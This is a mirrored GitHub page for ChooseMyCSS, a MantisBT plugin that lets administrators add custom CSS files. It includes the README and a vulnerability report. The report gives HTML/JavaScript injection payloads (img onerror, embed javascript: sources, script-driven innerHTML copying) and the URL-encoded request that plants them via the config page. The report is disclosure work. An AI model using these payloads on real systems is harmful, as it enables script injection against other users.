GithubHelp home page GithubHelp logo

mantisbt-plugins / choosemycss Goto Github PK

View Code? Open in Web Editor NEW
0.0 5.0 0.0 132 KB

mantisbt-plugin To simply add optionals or mandatorys CSS files

License: GNU General Public License v3.0

PHP 100.00%
mantisbt-plugin mantisbt php css

choosemycss's Introduction

Choose My CSS plugin for MantisBT

Copyright (c) 2020 Association Cocktail, Marc-Antoine TURBET-DELOF

Description

ChooseMyCSS is a plugin for MantisBT that allows the administrator to add some CSS files optional or mandatory for users.

Admin users create and name CSS files.

Some may be taged as mandatory. Then, they are all included for all users.

The others (not tagged as mandatory) can be chosen by stanard users to be applied in addition.

Change Log

See the Change log.

Installation

Requirements

The plugin requires MantisBT 2.24 (not tested on earlier releases).

Setup Instructions

  1. Download or clone a copy of the plugin's code.
  2. Copy the plugin (the ChooseMyCSS/ directory) into your Mantis installation's plugins/ directory.
  3. While logged in as an administrator, go to Manage → Manage Plugins.
  4. In the Available Plugins list, you'll find the ChooseMyCSS plugin; click the Install link.
  5. In the Installed Plugins list, click on the ChooseMyCSS plugin to configure it.
  6. Users can choose an optional CSS file in My account → Preferences.

Configuration

The list of additional CSS files can be defined on the plugin's config page.

Specify, for each file, if it's optional or mandatory.

All CSS files will be used before mandatory one chosen by a user.

If you chose multi mandatory CSS files, they will be added in the order in which they are displayed.

Screen Shots

In the plugin config page Manage → Manage Plugins → ChooseMyCSS

add CSS file

edit CSS files

In user preferences page My account → Preferences or Manage → Manage Users → login → Account Preferences

choose CSS file

Support

If you wish to file a bug report, or have questions related to use and installation, please use the plugin's issues tracker on GitHub.

All code contributions (bug fixes, new features and enhancements, translations) are welcome and highly encouraged, preferably as a Pull Request.

The latest source code is available on GitHub.

choosemycss's People

Contributors

maturbet avatar

Watchers

avatar avatar avatar avatar avatar

choosemycss's Issues

HTML Injection using CSS file content

Greetings ! After installing this extension and configuring it, the administrator can set a malicious css content that can trigger HTML Injection

Steps to produce

  • Install the extension and configure

  • Go to /plugin.php?page=ChooseMyCSS%2Fconfig_page

  • Fill up the Add new CSS form with this payload

<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'>
<embed src="javascript:alert(1)">
<img src="javascript:alert(1)">

Request

plugin_ChooseMyCSS_config_edit_token=20201016HTw6R4Lje1w_xqxswRNV240PWrbOy11C&file_title=Any+file+name&file_data=%3Cdiv+id%3D%22div1%22%3E%3Cinput+value%3D%22%60%60onmouseover%3Djavascript%3Aalert%281%29%22%3E%3C%2Fdiv%3E+%3Cdiv+id%3D%22div2%22%3E%3C%2Fdiv%3E%3Cscript%3Edocument.getElementById%28%22div2%22%29.innerHTML+%3D+document.getElementById%28%22div1%22%29.innerHTML%3B%3C%2Fscript%3E%0D%0A%3Cx+%27%3D%22foo%22%3E%3Cx+foo%3D%27%3E%3Cimg+src%3Dx+onerror%3Djavascript%3Aalert%281%29%2F%2F%27%3E%0D%0A%3Cembed+src%3D%22javascript%3Aalert%281%29%22%3E%0D%0A%3Cimg+src%3D%22javascript%3Aalert%281%29%22%3E&submit=Add+New+CSS

  • As a victim go to My Account page

  • Click the preference and you will see our payload get render

poc

official ?

#mantisbt-plugin
Bonjour @dregad,

Seriez-vous intéressé par ce plugin ?

Cordialement,

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.